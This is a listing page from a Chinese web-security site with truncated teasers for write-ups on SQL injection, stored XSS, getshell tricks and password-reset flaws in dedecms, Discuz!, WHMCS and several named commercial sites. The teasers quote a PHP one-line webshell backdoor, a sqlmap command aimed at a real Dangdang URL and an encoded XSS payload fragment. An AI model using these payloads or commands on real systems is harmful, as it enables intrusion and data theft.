Namazu cgi过滤不严敏感信息搜索及预览安全问题关注热度:28

Namazu来自日本神话，神话中说日本列岛被一条大鲶围绕着，可以引起地震等，这条大鱼就叫Namazu。日本大学、政府站点中有套常用的程序也叫Namazu，这套程序主要用于搜索网站内容。程..[详情]

php://input一句话木马 - 网站安全 - 自学php关注热度:727

在调研dedecms的历史漏洞时，发现了dedecms安装文件曾经出过被植入后门的漏洞（SSV-ID站点include目录下shopcar class php文件被植入一句话木马）@eval(file_get_contents( 39;php: input 39;))用脚本phpinp..[详情]

爱奇艺某功能挖出网站多处存储型XSS - 网站安全关注热度:24

借爱奇艺某功能挖出网站多处存储型XSS（打遍天下无敌手）STEP1 我们在一个具体的视频页面发起一个投票，标题是XSS代码，具体选项也是XSS代码，点击提交STEP2 查看我们的投票STEP3 我们..[详情]

Discuz! 后台第三方插件上传任意后缀文件拿shell（关注热度:88

Discuz!利用插件拿Discuz!论坛shell的文章：http: www 2cto com Article 201307 230113 html拿shell，我在这篇文章里面用到的插件是zend加密的，可能有系统不支持。今天谈的这个利用插件拿shell，是未加..[详情]

Discuz! 再次绕过安全密码安装插件 - 网站安全 -关注热度:41

第一版的绕过安全密码装插件：http: www 2cto com Article 201310 248549 html第一版后台拿shell：利用插件拿Discuz!论坛shell的文章http: www 2cto com Article 201307 230113 html第二版：Discuz! 后台第三..[详情]

Discuz! 绕过安全密码安装插件 - 网站安全 - 自学关注热度:17

前段时间我写了个利用插件拿Discuz!论坛shell的文章：http: www 2cto com Article 201307 230113 html很多人说安装插件需要 安全密码 ，其实很早我就发现安全密码可以绕过的，这样就能在安装插件的..[详情]

腾讯某站储存型xss及修复 - 网站安全 - 自学php关注热度:21

出现问题的站点http: bbs qrobot qq com在发帖处的flash 里插入构造好的xss代码http: 1 com u0022 u003e u003c u0069 u0066 u0072 u0061 u006d u0065 u002f u006f u006e u006c u006f u0061 u0064 u003d u0061..[详情]

Wordpress插件Quick Contact Form 6.0 持久型xss - 网站安全关注热度:17

=======================标题=====Quick Contact Form - Persistent Cross Site Scripting Vulnerability作者======Zy0d0x开发者======Quick Plugins - http: quick-plugins com 受影响产品========..[详情]

cmseasy getshell 0day - 网站安全 - 自学php关注热度:96

代码如下：celive index php 代码：$_SESSION[ 39;thislive 39;] = md5(time()); $_SESSION[ 39;thislivetmp 39;] = $_SESSION[ 39;thislive 39;]; if ($config[ 39;customer_info 39;]) {..[详情]

dedecms(织梦)album_add.php sql注入 - 网站安全 - 自学关注热度:37

dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的漏洞需要会员，所以比较鸡肋啦发表文章处，post表单的mtypesid可以注入 dedecmsnew me..[详情]

干掉盗号网站全过程 - 网站安全 - 自学php关注热度:167

一、被盗号找上门今天一打开QQ邮箱，看到个群邮件这货以发聚会照片为名义给出了一个网址http: 202 194 131 20 xcb xcb link php?id=73url=http: yyhhj emy in cc ?933046我估计着因为这段网址前半部分h..[详情]

Ajax的安全问题 - 网站安全 - 自学php关注热度:449

篇文章是关于我们探索基于Ajax的应用程序在评估过程中遇到的主要安全问题。AJAX：Ajax或非同步JavaScript和XML是一个相对较新的和动态的Web技术，其工作在异步方式与服务器进行交互。在..[详情]

当当网某业务静态SQL注入 - 网站安全 - 自学php关注热度:52

漏洞页面http: movie dangdang com list longBestSelling_C05* 01_P1 htm注入语句：python sqlmap py -u http: movie dangdang com list longBestSelling_C05* 01_P1 htm --dbms mssql --dbs发现和昨天那..[详情]

联想某站点任意用户密码重置 - 网站安全 - 自学关注热度:35

存在问题的站点：联想开发社区1 注册两个帐号，信息如下（可根据浏览器区分）：2 通过chrome浏览器调试工具修改其中一个用户信息如下：3 点击提交并抓包得到如下数据信息；4 我们将..[详情]

印象码验证存在重大逻辑问题可以简单绕过(含修关注热度:22

验证设计存在逻辑问题，验证通过的key对没有时间限制。一次正常通过的key对可以无限次通过验证，验证码形同虚设上述代码为印象码提供的sdk，可以看到其网站主后台判断用户是否通..[详情]

dedecms某一处insert型注入 - 网站安全 - 自学php关注热度:25

dedecms一处注入，较鸡肋，之前变量覆盖的漏洞太轰动了，所以一直没发出，之前5月份最新版本测试的，目前最新版本应该是没修复的漏洞需要会员，所以比较鸡肋啦发表文章处，post表..[详情]

边锋旗下某站存在盲注漏洞(修复机制绕过) - 网关注热度:22

过滤不完整，存在注入http: www yokagames com product product ?id=53 处存在注入漏洞其实还发现之前有人报过，但是修复仅仅做了简单过滤可绕过如空格替换为 ** 手工注了一下 注出了数据库和用..[详情]

联想某站点任意文件上传与下载漏洞可读取服务关注热度:29

存在问题的站点：http: legc lenovo com 1 上传头像处对过滤不严导致可上传任意文件：2 好在上传的文件和web应用进行了分离无法直接利用，但是这样却导致了另外一个问题，任意文件下载，..[详情]

联想某站点任意用户密码+资料修改(权限限制不严关注热度:12

存在问题的站点：http: legc lenovo com 一 任意用户密码修改1 注册一个帐号，点击来进行用户密码修改；2 抓包得到如下数据，发现未进行过多校验，通过修改用户id参数即可修改不用用户密..[详情]

联想某站点任意文件下载可读取服务器任意文件关注热度:16

问题站点是联想开发社区：http: developer lenovomm com 1 注册一个用户，看见有个上传新应用；2 我就不相信你们一个错误只犯一次，果不其然,提交以下请求；http: developer lenovomm com windev Rea..[详情]

利用社工绕道突破安全狗直取webshell - 网站安全关注热度:26

我的一位网赚朋友要获取某站的一些软件，找我帮忙。这个站不知道是什么cms。并且用扫描敏感信息就会有安全狗挡道。很蛋疼，主站没办法，只能从旁站入手，用御剑查了一下。162个..[详情]

WHMCS SQL注射 EXP - 网站安全 - 自学php关注热度:32

Localhost在汇报WHMCS SQL注射的时候，顺便和EXP一起发布了，这里就将他转了过来！本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!! usr bin env python 2013 10 03 - WHMCS 5..[详情]

xss攻击浏览器同源策略与跨域访问 - 网站安全关注热度:32

1、同源策略同源策略是一种约定，它是浏览器最核心也是最基本的安全功能。浏览器的同源策略， 限制了来自不同源的document或脚本，对当前document读取或设置某些属性 。邪恶的分..[详情]

容易忽视的前端陷阱 - 网站安全 - 自学php关注热度:13

CSRF（Cross Site Request Forgery）是伪造客户端请求的一种攻击，字面上的意思是跨站点伪造请求CSRF的定义是强迫受害者的浏览器向一个易受攻击的Web应用程序发送请求,最后达到攻击者所需要..[详情]

叽歪的CSRF漏洞 - 网站安全 - 自学php关注热度:22

www 2cto com：也是一篇老文章了，仅供技术分析声明，此漏洞已提交叽歪官方处理（2009-02-05），本案例仅作技术研究。由此漏洞造成的所有后果，本人不承担任何责任。参加集团「精武门..[详情]

百度Hi Csrf蠕虫攻击 - 网站安全 - 自学php关注热度:25

www 2cto com:08年的老文章了，可能以前整理资料的时候删掉了，再补上漏洞起因：百度是国内最大的中文搜索引擎。同时百度也提供了百度空间、百度贴吧等BLOG社区服务，拥有海量的用户..[详情]

Go语言实战 - revel框架教程之CSRF（跨站请求伪造）关注热度:53

CSRF是什么？请看这篇博文浅谈CSRF攻击方式，说的非常清楚。现在做网站敢不防CSRF的我猜只有两种情况，一是没什么人访问，二是局域网应用。山坡网之前属于第一种情况，哈哈，所以..[详情]

代码审计–Dedecms最新版本存储xss - 网站安全 - 自关注热度:32

由于编辑文章的模板参数 typeid2可控，导致存储XSS发生。dedecms dede templets article_edit htm页面316-325行代码如下：tr td height=24 colspan=2 class=blinetable width=800..[详情]

The problem with website security is us! - 网站安全 - 自学关注热度:18

I write a lot about website security Sometimes Irsquo;ll publicly point out flaws in software but there are many, many other times where it remains a private conversat..[详情]

一个XSS引发汉庭酒店内部系统沦陷的经典案例关注热度:24

那天恰巧刷乌云，看到有人提交漏洞WooYun: 汉庭优惠券免费无限领取漏洞，刷券咯～，汉庭就进入了我的眼帘，这次测试只是想起貌似这个酒店有我的资料，想看看安不安全。。。第一想..[详情]